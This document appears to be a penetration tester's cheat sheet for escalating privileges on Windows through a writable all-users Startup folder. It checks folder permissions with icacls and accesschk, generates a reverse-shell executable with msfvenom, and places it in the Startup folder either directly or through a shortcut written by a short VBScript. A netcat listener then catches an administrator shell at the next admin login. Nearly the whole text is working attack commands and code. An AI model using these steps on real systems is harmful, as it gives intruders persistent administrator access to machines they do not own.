The files in this directory are shortcuts (lnk files).
#In Low level shell run:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Check if BUILTIN\Users group has full access (F)
#You can also run accesschk.exe to check for (F)
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Generate payloaad:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe
#METHOD 1
#Transfer it to
C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup
#Start a netcat listener and simulate a login from admin to get a shell
#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript to create a shortcut of that exe to the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save
#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs
#Simulate an admin login to get a shell
